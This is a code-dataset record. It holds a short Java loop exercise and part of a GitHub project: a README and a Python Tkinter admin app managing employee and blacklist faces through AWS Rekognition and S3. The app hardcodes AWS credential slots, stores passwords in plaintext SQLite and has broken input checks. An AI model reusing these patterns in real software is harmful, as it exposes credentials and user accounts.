"text": "\r\npublic class Ex19 {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\t// for문 3단부터 7단까지 4곱부터 6곱까지\r\n\t\t// 1 2 4\r\n\t\tfor(int dan = 3 ; dan <= 7 ; dan ++) {\r\n\t\t\t// 3시작\r\n\t\t\t// 3-1 3-2 3-4\r\n\t\t\tfor (int gop = 4; gop <= 6; gop++) {\r\n\t\t\t\t// 3-3\r\n\t\t\t\tSystem.out.println(\r\n\t\t\t\t\t\tdan + \" * \" + gop + \" = \" + dan * gop);\r\n\t\t\t}\r\n\t\t\t// 3끝\r\n\t\t}\r\n\t\tSystem.out.println(\"=====while=====\");\r\n\t\tint dan = 3;// 1\r\n\t\twhile(dan <= 7) {//2\r\n\t\t\t//3\r\n\t\t\tint gop = 4; // 3-1\r\n\t\t\twhile (gop <= 6) { // 3-2\r\n\t\t\t\t// 3-3\r\n\t\t\t\tSystem.out.println(\r\n\t\t\t\t\t\tdan + \" * \" + gop + \" = \" + dan * gop);\r\n\t\t\t\t// 3-4\r\n\t\t\t\tgop++; \r\n\t\t\t}\r\n\t\t\tdan++;// 4\t\t\t\r\n\t\t}\r\n\t}\r\n\r\n}\r\n\r\n\r\n\r\n\r\n\r\n" } ]
17
MusieYemane/Access-Control-using-AWS-Face-Rekognition-Service-in-Python
https://github.com/MusieYemane/Access-Control-using-AWS-Face-Rekognition-Service-in-Python
741c844422dda8ba5a38dc67d1a56400c4a232ed
fe196d5541521f1154042b4df6d0c716dde3b46f
47c2aac3ae3f92df607f8d912e6918701ff9d4f6
refs/heads/master
2023-01-03T21:55:55.269103
2020-10-31T11:59:12
2020-10-31T11:59:12
308,823,451
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.8026700019836426, "alphanum_fraction": 0.8035044074058533, "avg_line_length": 118.80000305175781, "blob_id": "5374079d283816393da8beb51b01455269c78601", "content_id": "db09c05b594367c47e3e5fb7ab1bd46c0c3eed83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2397, "license_type": "no_license", "max_line_length": 1232, "num_lines": 20, "path": "/README.md", "repo_name": "MusieYemane/Access-Control-using-AWS-Face-Rekognition-Service-in-Python", "src_encoding": "UTF-8", "text": "# Access-Control-using-AWS-Face-Rekognition-Service-in-Python\nIn this project, we propose the use of facial recognition in access control system. Nowadays, facial recognition is applied in many fields from logging in to user account through built in camera of smartphones to identification of suspected people by the law enforcements. A manager of a company that uses this system have access to an application, which is designed to let the manger add staff of the company as well as any suspected criminal along with their photo. The application let the manager assign the staffs as employees, but suspected people are assigned as blacklists. The information is stored in amazon web service. On the other hand, a camera is implemented at a required entrance to stream real time video and detect face. If face is detected, the camera sends face recognition request to amazon web service where the manager previously added people. Finally, the system will be able to recognize the detected face as either employee, blacklist or unknown. The entrance opens if the face is recognized as an employee, whereas if the face is unknown the entrance remains closed and a speaker asks the user to visit the security for more information. If the face is detected as a blacklist, the system alerts an alarm.\n\n\n\nHow this project works:\n\nFirst, create Amazon Web Service Account so that you have can access Amazon face rekognition service, which is extensively applied in this project. \nIn your aws account, go to user and add new policies, Rekognition full access and IAM user.\n\nThen, open admin_monitor.py in your favourite python editor and find variables access_key_id and secret_access_key. Replace the value of the r actual aws key and secret id, which you can get from your aws account. Do the same to the face_recognition_system.py.\n\nFinally, run admin_monitor.py using python3 and you will see a sign up page. Sign up and then log in. \n\nAfter logging in, you have an admin access to the system. You can add people and their face image and label them as employee or blacklists.\n\nThen run face_recognition_system.py using python3. This will open a window which takes a real time video using your computer's camera. If a face is detected, then it compares it against the people you previously added and outputs either employee or blacklist if they are recognized, else it outputs unknown person.\n\n\nEnjoy! \n" }, { "alpha_fraction": 0.509757936000824, "alphanum_fraction": 0.5246694684028625, "avg_line_length": 36.725894927978516, "blob_id": "693018029309b9388ffa29fc91a7628ba80cba50", "content_id": "411e65258c4221b059998f540536ffd6d5f8b174", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47346, "license_type": "no_license", "max_line_length": 164, "num_lines": 1255, "path": "/admin_monitor.py", "repo_name": "MusieYemane/Access-Control-using-AWS-Face-Rekognition-Service-in-Python", "src_encoding": "UTF-8", "text": "import csv\nimport tkinter as tk\nfrom tkinter import *\nimport os\nimport logging\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom PIL import ImageTk, Image\nimport boto3\nfrom botocore.exceptions import ClientError\nimport _sqlite3\n\n### Before running this code, create an amazone account user and get the aws secret key and access key id.\n###And also go to aws users--> add permissions--> add AmazoneS3Fullaccess and AmazonRekognitionFullAccess and IAMUserChanegePassword permissions\n\naccess_key_id = '**************' ##Enter your AWS access key id here for ex. 'AKIL4GOQL&QREDSFFUTQT'\nsecret_access_key = '*****************' ##Enter your AWS Secret access key here ex.'QS5W/xw5zdM6bcZwbz2ZYyLLQlmqdEibQIyn4L87'\n\n# create a database or connect to one\n\nconn = _sqlite3.connect('Register.db')\n\n# create a cursor\n\nc = conn.cursor()\n\n\n# # create a table\n#\n# c.execute(\"\"\" CREATE TABLE address(\n# firs_name text,\n# last_name text,\n# username text,\n# password text\n#\n# )\"\"\")\n\n\n################################################################################################\n# create subbimit functio to define submit\n\nf = open(\"tempUser\", \"r\")\nuname = f.readline()\nf.close()\n\nclass App(Tk):\n def __init__(self, *args, **kwargs):\n Tk.__init__(self, *args, **kwargs)\n # Setup Menu\n MainMenu(self)\n self.winfo_toplevel().title(\"Face Recognition Access Control\")\n # Setup Frame\n container = Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n\n for F in (StartPage, loginPage, signupPage, deleteAccountPage, PageTwo):\n frame = F(container, self)\n self.frames[F] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n\n if not uname:\n self.show_frame(StartPage)\n else:\n self.show_frame(PageTwo)\n\n\n def show_frame(self, context):\n frame = self.frames[context]\n frame.tkraise()\n\n def get_page(self, page_class):\n return self.frames[page_class]\n\n\nclass StartPage(Frame):\n def __init__(self, parent, controller):\n\n Frame.__init__(self, parent)\n self.controller = controller\n\n Frame.config(self,bg='lightgreen')\n\n label = Label(self, text=\" Start Page \",\n font=(\"Arial Black\", 20, 'bold'), bg= 'darkred', fg='lightyellow')\n label.grid(row=0, )\n\n btnLogin = Button(self, text=\"Log In\", width=50,\n command=lambda: controller.show_frame(loginPage))\n btnLogin.grid(row=1, column=0, ipady=20, pady=20, padx=120)\n btnSignup = Button(self, text=\"Sign Up\", width=50,\n command=lambda: controller.show_frame(signupPage))\n btnSignup.grid(row=2, column=0, ipady=20, pady=20, padx=120)\n\n deleteAccount = Button(self, text=\"Delete Account\", width=50,\n command=lambda: controller.show_frame(deleteAccountPage))\n deleteAccount.grid(row=3, column=0, ipady=20, pady=20, padx=120)\n\n\n\nclass loginPage(Frame):\n def __init__(self, parent, controller):\n Frame.__init__(self, parent)\n self.controller = controller\n Frame.config(self, bg='lightgreen')\n\n label = Label(self, text=\" Login Page \",\n font=(\"Arial Black\", 20, 'bold'), bg= 'darkred', fg='lightyellow')\n label.grid(row=0, column=0, columnspan=2)\n label.config(font=(\"Times\", 40, 'bold'), fg='white', bg='darkred')\n\n username_label = Label(self, text=\"Username:\",font=(\"Times\", 20), bg='lightgreen')\n username_label.grid(row=2, column=0, pady=20)\n\n password_label = Label(self, text=\"Password:\", font=(\"Times\", 20), bg='lightgreen')\n password_label.grid(row=3, column=0, pady=20)\n\n self.username = Entry(self, width=30)\n self.username.grid(row=2, column=1, padx=0, pady=20)\n\n self.password = Entry(self, width=30, show=\"*\")\n self.password.grid(row=3, column=1, padx=0, pady=20)\n\n login_btn = Button(self, text=\"Login\", command=self.login)\n login_btn.grid(row=4, column=0, columnspan=2,\n pady=20, padx=10, ipadx=100, ipady=10)\n\n login_btn = Button(self, text=\"Back\",\n command=lambda: controller.show_frame(StartPage))\n login_btn.grid(row=5, column=0, columnspan=2,\n pady=20, padx=10, ipadx=100, ipady=10)\n\n def login(self):\n conn = _sqlite3.connect('Register.db')\n\n # create a cursor\n\n c = conn.cursor()\n print_results = ''\n if self.username.get == \"\" or self.password.get() == \"\":\n messagebox.showerror('Incomplete Entry','Please complete the required field!')\n # print_results = \"Please complete the required field!\"\n else:\n c.execute(\"select * FROM `address` WHERE `username` = ? and `password` = ?\",\n (self.username.get(), self.password.get()))\n\n if c.fetchone() is not None:\n # print_results = \"You Successfully login\"\n #set username to the log in username to identify his collection and folder photo\n\n # write the input to tempUser to remember him as temporary user\n f = open(\"tempUser\", \"w\")\n f.write(self.username.get())\n\n f = open(\"tempUser\", \"r\")\n uname=f.readline()\n # update the uname in PageTwo\n self.controller.get_page(PageTwo).setUserName()\n\n self.controller.get_page(PageTwo).list_faces_in_collection()\n self.controller.show_frame(PageTwo)\n f.close()\n\n else:\n messagebox.showerror('Invalid Entry', 'Invalid Username or password')\n # print_results = text = \"Invalid Username or password\"\n self.username.delete(0, END)\n self.password.delete(0, END)\n\n # create label results\n lbl_result1 = Label(self, text=print_results)\n lbl_result1.grid(row=11, column=0, columnspan=2)\n\n # commit changes\n conn.commit()\n\n # close connection\n conn.close()\n\n # create a delete registry function\n\n\nclass signupPage(Frame):\n def __init__(self, parent, controller):\n Frame.__init__(self, parent)\n self.controller = controller\n Frame.config(self, bg='lightgreen')\n\n label = Label(self, text=\" Signup Page \",\n font=(\"Arial Black\", 20, 'bold'), bg='darkred', fg='lightyellow')\n label.grid(row=0, column=0, columnspan=2)\n label.config(font=(\"Times\", 40, 'bold'), fg='white', bg='darkred')\n\n\n self.f_name = Entry(self, width=30)\n self.f_name.grid(row=1, column=1, padx=20)\n\n self.l_name = Entry(self, width=30)\n self.l_name.grid(row=2, column=1, padx=20)\n\n self.username = Entry(self, width=30)\n self.username.grid(row=3, column=1, padx=20)\n\n self.password = Entry(self, width=30, show=\"*\")\n self.password.grid(row=4, column=1, padx=20)\n\n self.email = Entry(self, width=30)\n self.email.grid(row=5, column=1, padx=20)\n #########################################################################################################\n # create Text Boxes Labels\n f_name_label = Label(self, text=\"First Name\", font=(\"Times New Roman\", 16), bg='lightgreen')\n f_name_label.grid(row=1, column=0, pady=20, )\n\n l_name_label = Label(self, text=\"Last Name\", font=(\"Times New Roman\", 16),bg='lightgreen')\n l_name_label.grid(row=2, column=0, pady=20)\n\n username_label = Label(self, text=\"Username\", font=(\"Times New Roman\", 16),bg='lightgreen')\n username_label.grid(row=3, column=0, pady=20)\n\n password_label = Label(self, text=\"Password\", font=(\"Times New Roman\", 16),bg='lightgreen')\n password_label.grid(row=4, column=0, pady=20)\n\n lblEmail = Label(self, text=\"Email\", font=(\"Times New Roman\", 16), bg='lightgreen')\n lblEmail.grid(row=5, column=0, pady=20)\n\n ########################################################################################################\n # create a submit buttons\n submit_btn = Button(self, text=\"Register\", command=self.submit)\n submit_btn.grid(row=6, column=0, columnspan=2,\n pady=10, padx=10, ipadx=100, ipady=20)\n\n login_btn = Button(self, text=\"Back\",\n command=lambda: controller.show_frame(StartPage))\n login_btn.grid(row=7, column=0, columnspan=2,\n pady=10, padx=10, ipadx=100, ipady=20)\n\n # # create a query button\n # qury_btn = Button(self, text=\"Show Records\", command=self.query)\n # qury_btn.grid(row=9, column=0, columnspan=2, pady=10, padx=10, ipadx=137)\n #\n # # create a delete button\n # delet_btn = Button(self, text=\"Delete A Record\", command=self.delete)\n # delet_btn.grid(row=8, column=0, columnspan=2)\n\n # navigate to pages\n # page_one = Button(self, text=\"Page One\", command=lambda: controller.show_frame(PageOne))\n # page_one.grid()\n # page_two = Button(self, text=\"Page Two\", command=lambda: controller.show_frame(PageTwo))\n # page_two.grid()\n # This adds a folder to bucket/DB to store photos for each signing up users\n\n\n # # Create a folder in the aws database/ bucket named mosibucket1\n # def createFolderInBucket(self, username):\n # s3 = boto3.client('s3',\n # aws_access_key_id=access_key_id,\n # aws_secret_access_key=secret_access_key,\n # region_name='us-east-2'\n # )\n # bucket_name = \"mosibucket1\"\n # directory_name = username # it's name of your folders\n # s3.put_object(Bucket=bucket_name, Key=(directory_name + '/'))\n #\n #create a storage of pjotos called s3 bucket at s3 database\n\n # def deleteFolderInBucket(self, username):\n # s3 = boto3.resource('s3',\n # aws_access_key_id=access_key_id,\n # aws_secret_access_key=secret_access_key,\n # region_name='us-east-2'\n # )\n # bucket = s3.Bucket('mosibucket1')\n # bucket.objects.filter(Prefix=username + '/').delete()\n\n def createBucket(self, username):\n s3 = boto3.client('s3',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n #better to put try and error as bucket names are unique in the region and others could already took ur name\n response = s3.create_bucket(\n Bucket='mosiusersbucket-' + username,\n CreateBucketConfiguration={\n 'LocationConstraint': 'us-east-2',\n },\n )\n\n def createFaceCollection(self, username):\n client = boto3.client('rekognition',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n response = client.create_collection(\n CollectionId=username\n )\n\n\n\n\n def submit(self):\n conn = _sqlite3.connect('Register.db')\n\n # create a cursor\n\n c = conn.cursor()\n result2 = \"\"\n\n if self.f_name.get == \"\" or self.l_name.get() == \"\" or self.username.get() == \"\" or self.password.get == \"\":\n result2 = \"Please complete the required field!\"\n else:\n c.execute(\"SELECT * FROM `address` WHERE `username` = ?\",\n (self.username.get(),))\n if c.fetchone() is not None:\n result2 = \"Username is already taken\"\n else:\n c.execute(\"INSERT INTO address VALUES(:f_name, :l_name, :username, :password)\",\n\n {\n 'f_name': self.f_name.get(),\n 'l_name': self.l_name.get(),\n 'username': self.username.get(),\n 'password': self.password.get()\n\n }\n )\n\n # Create a folder in the aws database/ bucket named mosibucket1\n self.createBucket(self.username.get())\n # create a collection to store faces\n self.createFaceCollection(self.username.get())\n\n\n # create a confirmation label\n\n lbl_result = Label(self, text=result2)\n lbl_result.grid(row=11, column=0, columnspan=2)\n\n ###################################################################################################################################\n\n # Insert Into a Table\n\n # commit changes\n conn.commit()\n\n # close connection\n conn.close()\n\n # clear text boxes\n self.f_name.delete(0, END)\n self.l_name.delete(0, END)\n self.username.delete(0, END)\n self.password.delete(0, END)\n\n\n # create a query function\n def query(self):\n conn = _sqlite3.connect('Register.db')\n\n # create a cursor\n\n c = conn.cursor()\n\n # Query the database\n c.execute(\"SELECT *, oid FROM address\")\n records = c.fetchall()\n # print(records)\n\n # Loop through results\n print_records = ''\n for record in records:\n print_records += str(record[0]) + \" \" + str(record[1]) + \\\n \" \" + str(record[2]) + \" \" + str(record[3]) + \"\\n\"\n\n # creat a label records\n\n query_label = Label(self, text=print_records)\n query_label.grid(row=10, column=0, columnspan=2)\n\n # commit changes\n conn.commit()\n\n # close connection\n conn.close()\n\n\n\nclass deleteAccountPage(Frame):\n def __init__(self, parent, controller):\n Frame.__init__(self, parent)\n self.controller = controller\n Frame.config(self, bg='lightgreen')\n\n label = Label(self, text=\" Delete Account Page \",\n font=(\"Arial Black\", 20, 'bold'), bg='darkred', fg='lightyellow')\n label.grid(row=0, column=0, columnspan=2)\n label.config(font=(\"Times\", 40, 'bold'), fg='white', bg='darkred')\n\n self.username = Entry(self, width=30)\n self.username.grid(row=2, column=1, padx=20)\n\n self.password = Entry(self, width=30, show=\"*\")\n self.password.grid(row=3, column=1, padx=20)\n\n username_label = Label(self, text=\"Username:\", font=(\"Times\", 18), bg='lightgreen')\n username_label.grid(row=2, column=0, pady=30)\n\n password_label = Label(self, text=\"Password:\", font=(\"Times\", 18), bg='lightgreen')\n password_label.grid(row=3, column=0,pady=30)\n\n # create a delete button\n delet_btn = Button(self, text=\"Delete Account\", command=self.delete)\n delet_btn.grid(row=4, column=0, columnspan=2,\n pady=20, ipadx=40, ipady=10)\n\n delet_btn = Button(self, text=\"Back\",\n command=lambda: controller.show_frame(StartPage))\n delet_btn.grid(row=5, column=0, columnspan=2,\n pady=20, ipadx=40, ipady=10)\n\n # create a query button\n qury_btn = Button(self, text=\"Show Records\", command=self.query)\n qury_btn.grid(row=6, column=0, columnspan=2,\n pady=10, padx=10, ipadx=137)\n\n # create a delete registry function\n def deleteBucket(self, username):\n s = boto3.resource('s3',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n bucket = s.Bucket('mosiusersbucket-'+username)\n bucket.object_versions.delete()\n\n s3 = boto3.client('s3',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n response = s3.delete_bucket(\n Bucket='mosiusersbucket-'+username\n )\n\n def deleteFaceCollection(self, username):\n client = boto3.client('rekognition',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n response = client.delete_collection(\n CollectionId=username\n )\n\n\n def delete(self):\n # create a database or connect to one\n\n conn = _sqlite3.connect('Register.db')\n\n # create a cursor\n\n c = conn.cursor()\n\n # Delete a record\n print_results2 = ''\n if self.username.get == \"\" or self.password.get() == \"\":\n print_results2 = \"Please complete the required field!\"\n else:\n c.execute(\"DELETE from address WHERE `username` = ? and `password` = ?\",\n (self.username.get(), self.password.get()))\n # if c.fetchone() is None:\n # print_results2 = \"You Successfully deleted\"\n # else:\n # print_results2 = text = \"Invalid Username or password\"\n\n # delete the bucket folder and collection in aws database\n self.deleteFaceCollection(self.username.get())\n self.deleteBucket(self.username.get())\n\n self.username.delete(0, END)\n self.password.delete(0, END)\n\n # create label results\n lbl_result2 = Label(self, text=print_results2)\n lbl_result2.grid(row=12, column=0, columnspan=2)\n\n # commit changes\n conn.commit()\n\n # close connection\n conn.close()\n\n\n\n def query(self):\n conn = _sqlite3.connect('Register.db')\n\n # create a cursor\n\n c = conn.cursor()\n\n # Query the database\n c.execute(\"SELECT *, oid FROM address\")\n records = c.fetchall()\n # print(records)\n\n # Loop through results\n print_records = ''\n for record in records:\n print_records += str(record[0]) + \" \" + str(record[1]) + \\\n \" \" + str(record[2]) + \" \" + str(record[3]) + \"\\n\"\n\n # creat a label records\n\n query_label = Label(self, text=print_records)\n query_label.grid(row=10, column=0, columnspan=2)\n\n # commit changes\n conn.commit()\n\n # close connection\n conn.close()\n\n\nclass PageTwo(Frame):\n def __init__(self, parent, controller):\n Frame.__init__(self, parent)\n self.controller = controller\n Frame.config(self,bg='lightgreen')\n\n titleFrame = Frame(self) # create empty box\n # Thin inserts topFrame to the root app\n titleFrame.pack()\n titleFrame.config(bg='lightgreen')\n\n topFrame = Frame(self) # create empty box\n topFrame.pack() # Thin inserts topFrame to the root app\n topFrame.config(bg='lightgreen')\n\n bottomFrame = Frame(self)\n bottomFrame.pack()\n bottomFrame.config(bg='lightgreen')\n\n frame3 = Frame(self)\n frame3.pack()\n frame3.config(bg='lightgreen')\n #\n # frame4 = Frame(self)\n # frame4.grid(row=4, pady=10)\n # # frame4.config(bg='lightgreen')\n #\n # frame5 = Frame(self)\n # frame5.grid(row=5, pady=10)\n # frame5.config(bg='lightblue')\n #\n # frame6 = Frame(self)\n # frame6.grid(row=6, pady=10)\n # # frame6.config(bg='lightgreen')\n\n l = Label(titleFrame, text=\" Admin Monitor \")\n l.grid(row=0)\n l.config(font=(\"Arial Black\", 20, 'bold'),\n bg='darkred', fg='lightyellow', justify=CENTER)\n\n self.currentUser = Label(titleFrame, text='')\n self.currentUser.grid(row=1)\n self.currentUser.config(font=(\"Times\", 14,'bold'),\n fg='green', justify=CENTER, bg='lightgreen')\n\n l1 = Label(topFrame, text=\"First Name: \")\n l1.grid(row=1, padx=0)\n l1.config(font=(\"Times\", 20), fg='black',bg='lightgreen')\n l2 = tk.Label(topFrame, text=\"Last Name: \")\n l2.grid(row=2)\n l2.config(font=(\"Times\", 20), fg='black',bg='lightgreen')\n l3 = tk.Label(topFrame, text=\"Permission: \")\n l3.grid(row=3)\n l3.config(font=(\"Times\", 20), fg='black',bg='lightgreen')\n\n # make entries/ input\n self.e1 = Entry(topFrame, width=40)\n self.e1.grid(row=1, column=1, pady=10)\n self.e1.config(validate='key' ,validatecommand=(\n self.register(self.validateStr), '%P'))\n\n self.e2 = Entry(topFrame, width=40)\n self.e2.grid(row=2, column=1, pady=20)\n self.e2.config(validate='key', validatecommand=(\n self.register(self.validateStr), '%P'))\n\n self.options = tk.StringVar()\n self.e3 = tk.OptionMenu(topFrame, self.options,\n 'Employee', 'Blacklist')\n self.e3.grid(row=3, column=1, pady=10)\n self.e3.config(pady=10, padx=90, width=8, bg='lightgreen')\n self.options.set('---')\n\n # self.mb = Menubutton(topFrame, text=\"Add People\")\n # self.mb.menu = Menu(self.mb)\n # self.mb[\"menu\"] = self.mb.menu\n # self.mb.menu.add_command(\n # label=\"Browse from computer\", command=self.uploadFile)\n # self.mb.menu.add_command(\n # label=\"Take photo from Camera\", command=lambda: print(\"Opening camera...\"))\n #\n # self.mb.grid(row=4, column=1, pady=20)\n # self.mb.config(pady=15, padx=30, width=15,font=(\"Calibri\", 15, 'bold'))\n\n # delete employees button\n btnAdd = Button(topFrame,\n text=\"Add Person\",\n fg=\"black\",\n width=15,\n command=self.uploadFile,\n )\n\n btnAdd.grid(row=4, column=1, pady=20)\n btnAdd.config(pady=15, padx=30, width=15,font=(\"Calibri\", 15, 'bold'))\n\n # delete employees button\n btnDelete = Button(frame3,\n text=\"Delete\",\n fg=\"black\",\n width=15,\n command=self.deletePhoto,\n )\n\n btnDelete.grid(row=2,column=1, sticky=tk.W, pady=4, padx=8)\n btnDelete.config(pady=10)\n\n # show employees photo button\n btnShowEmpPhoto = Button(frame3,\n text=\"Photo\",\n fg=\"black\",\n width=15,\n command=self.showEmpImage,\n )\n\n btnShowEmpPhoto.grid(row=2, column=0, sticky=tk.W, pady=4, padx=40)\n btnShowEmpPhoto.config(pady=10)\n\n # delet blacklist button\n btnDelete2 = Button(frame3,\n text=\"Delete\",\n fg=\"black\",\n width=15,\n command=self.deleteBlacklist,\n )\n\n btnDelete2.grid(row=2, column=4, sticky=tk.W, pady=4, padx=8)\n btnDelete2.config(pady=10)\n\n # show blacklist photo button\n btnShowBlackPhoto = Button(frame3,\n text=\"Photo\",\n fg=\"black\",\n width=15,\n command=self.showBlackPhoto,\n )\n\n btnShowBlackPhoto.grid(row=2, column=3, sticky=tk.W, pady=4, padx=40)\n btnShowBlackPhoto.config(pady=10)\n\n # List of people authorized\n self.showList = Label(frame3, text=\" Id List of Employees \")\n self.showList.grid(row=0,columnspan=2, sticky=\"W\")\n self.showList.config(font=(\"Calibri\", 20, 'bold'),fg='white', bg='black')\n\n\n self.lboxEmpl = tk.Listbox(\n frame3, justify=LEFT, selectbackground='white', highlightbackground='white')\n self.lboxEmpl.grid(row=1,columnspan=2, sticky=\"W\")\n self.lboxEmpl.config(font=(\"times\", 20), bg='lightblue',\n fg='darkred', highlightbackground='Black', width=43, height=12)\n self.lboxEmpl.curselection()\n\n # List of people blacklists\n self.showBlackList = Label(frame3, text=\" Id List of Blacklists \")\n self.showBlackList.grid(row=0,column=3,columnspan=2, sticky=\"W\",padx=3 )\n self.showBlackList.config(\n font=(\"Calibri\", 20, 'bold'), fg='white', bg='black')\n\n # showBlackNames=Label(frame5,text = \"\",anchor=W, justify=LEFT)\n # showBlackNames.grid(row=1, sticky=\"W\")\n # showBlackNames.config(font=(\"times\", 20),bg='lightblue',fg='darkred')\n self.lboxBlack = tk.Listbox(\n frame3, justify=LEFT, selectbackground='white', highlightbackground='white')\n self.lboxBlack.grid(row=1,column=3,columnspan=2, sticky=\"W\", padx=3)\n self.lboxBlack.config(font=(\"times\", 20),\n bg='lightblue', fg='darkred', width=43, height=12)\n\n\n self.btnLogout = Button(self, text=\"Log out\",bg='darkred', command=self.logout,\n font = ('calibri', 10, 'bold'),\n foreground = 'green',)\n # btnLogout.grid(ipadx=5, ipady=10)\n self.btnLogout.place(x=775, y=12,relwidth=0.1, relheight=0.03)\n self.faceNameInBucket = []\n\n # read the username from tempUser file\n f = open(\"tempUser\", \"r\")\n self.uname = f.readline()\n f.close()\n\n self.setUserName()\n\n #create a label to show photos\n self.theImage = Label(self,image='',bg=\"black\", borderwidth=4, relief=\"groove\")\n self.theImage.place(x=283, y=518, height=130, width=150)\n\n self.theImageB = Label(self, image='',bg='black', borderwidth=4, relief=\"groove\")\n self.theImageB.place(x=719, y=518, height=130, width=150)\n\n # When program starts, after loading GUI, the list of peoplr available will be displayed on user endpoint\n self.list_faces_in_collection()\n\n def setUserName(self):\n f = open(\"tempUser\", \"r\")\n uname = f.readline()\n self.currentUser.config(text='Hi '+uname.capitalize())\n self.btnLogout.config(text='Log out '+uname.capitalize())\n f.close()\n\n\n def logout(self):\n\n self.theImage.config(image='' )\n self.theImageB.config(image='')\n\n # log out of the previous user\n f = open(\"tempUser\", \"w\")\n f.write('')\n\n self.controller.show_frame(StartPage)\n\n def getEntry(self):\n firstName = self.e1.get()\n lastName = self.e2.get()\n permission = self.options.get()\n if permission == 'Employee':\n permission = 'a'\n elif permission == 'Blacklist':\n permission = 'b'\n\n fileName = firstName + \"_\" + lastName + \"_\" + permission + \".jpg\"\n\n return fileName\n\n def getImagePath(self, title='Select File'):\n # root.attributes(\"-topmost\", True)\n # root.withdraw()\n file_path = filedialog.askopenfile()\n if file_path:\n return file_path.name\n else:\n return None\n\n def searchFaceInCollection(self, face):\n # client access for rekognition\n client = boto3.client('rekognition',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2')\n\n # encode the image and get a response\n with open(face, 'rb') as source_image:\n source_bytes = source_image.read()\n\n\n # # to use phot from the aws s3 storage, apply this code\n response = client.search_faces_by_image(\n CollectionId=self.uname,\n Image={'Bytes': source_bytes}\n )\n\n # since response is a dictionary, we can loop it\n # print(response)\n\n for key, value in response.items():\n if key == 'FaceMatches': # go to facematch key of the response dictionary\n if value: # check if faceMatch have value as list\n\n if (value[0][\n 'Similarity'] > 80): # similarity of captured image and photo at collection should be greater than 80, just to make sure it is accurate\n print(key)\n print(\"Similarity rate: \", value[0]['Similarity'],\n \"\\nFace ID from collection: \", value[0]['Face']['FaceId'],\n \"\\nImage ID captured photo: \", value[0]['Face']['ImageId'],\n # \"\\nImage Name: \", value[0]['Face']['ExternalImageId'], ###### note: we can put the name of the person and authorization here\n ) # value[0] is dictionary\n\n information = value[0]['Face']['ExternalImageId'].split(\n \".\") # remove .jpg or .png\n\n info = information[0].split(\"_\") # split the names\n\n name = info[0] + \" \" + info[1]\n authorization = info[2]\n\n if authorization == 'a':\n print(\"This Face is already registered as \" +\n name + ' as an Employee')\n self.notifyAdmin = \"Face already registered as: \\n\" + \\\n 'Name: ' + name + ' \\nAuthority: Employee'\n return True\n\n elif (authorization == \"b\"):\n print(\"This Face is already registered as \" +\n name + ' as a Blacklist')\n self.notifyAdmin = \"Face already registered as: \\n\" + \\\n 'Full Name: ' + name + ' \\nAuthority: Blacklist'\n return True\n\n else: # if it is empty, then there is no simillary person\n return False\n\n def upload_file(self, file_name, bucket, object_name=None):\n \"\"\"Upload a file to an S3 bucket\n\n :param file_name: File to upload\n :param bucket: Bucket to upload to\n :param object_name: S3 object name. If not specified then file_name is used\n :return: True if file was uploaded, else False\n \"\"\"\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n client = boto3.client('s3',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n try:\n response = client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True\n\n def uploadFile(self,):\n s3 = boto3.client('s3',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n imagePath = self.getImagePath()\n\n # Check if user exist or not\n firstName = self.e1.get()\n lastName = self.e2.get()\n fullName = firstName + \" \" + lastName\n\n # Check if same person exist on the s3 and face detected on the collection of faces\n if fullName not in self.faceNameInBucket:\n if not self.searchFaceInCollection(imagePath):\n if imagePath: # check if selected image is not empty directory\n faceName = self.getEntry() # name the face in the format of firstName_lastName_a.jpg\n\n with open(imagePath, \"rb\") as f: # put the path of the captured image\n # s3.upload_fileobj(f, \"mosibucket1\", faceName)\n s3.upload_fileobj(f,'mosiusersbucket-'+self.uname,faceName)\n\n print(\"Uploading Done!\")\n\n # afetr uploading image to bucket, then add it to collection\n self.addPhoto(faceName)\n\n else:\n print(\"No file selected!\")\n else:\n messagebox.showerror('Person Identified',\n self.notifyAdmin)\n # print(searchFaceInCollection.notifyAdmin)\n else:\n print(\"Name Exist In our record, Please Change name\")\n messagebox.showerror(\n \"Invalid Name\", \"Name Exist In our record, Please Change Name\")\n\n self.e1.delete(0, END)\n self.e2.delete(0, END)\n\n\n # adding faces to collection\n def add_faces_to_collection(self, bucket, photo, collection_id):\n client = boto3.client('rekognition',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n\n response = client.index_faces(CollectionId=collection_id,\n Image={'S3Object': {\n 'Bucket': bucket,'Name': photo}},\n ExternalImageId=photo,\n MaxFaces=1,\n QualityFilter=\"AUTO\",\n DetectionAttributes=['ALL'])\n\n print('Results for ' + photo)\n print('Faces indexed:')\n if response['FaceRecords']:\n print(\"Face Successfully added\")\n for faceRecord in response['FaceRecords']:\n print(' Face ID: ' + faceRecord['Face']['FaceId'])\n print(' Location: {}'.format(\n faceRecord['Face']['BoundingBox']))\n # update the list of users avilable at the user end\n self.list_faces_in_collection()\n else:\n messagebox.showerror(\n 'Face not detected, Please provide clear photo!')\n print('Face not detected, Please provide clear photo!')\n for unindexedFace in response['UnindexedFaces']:\n print(' Location: {}'.format(\n unindexedFace['FaceDetail']['BoundingBox']))\n print(' 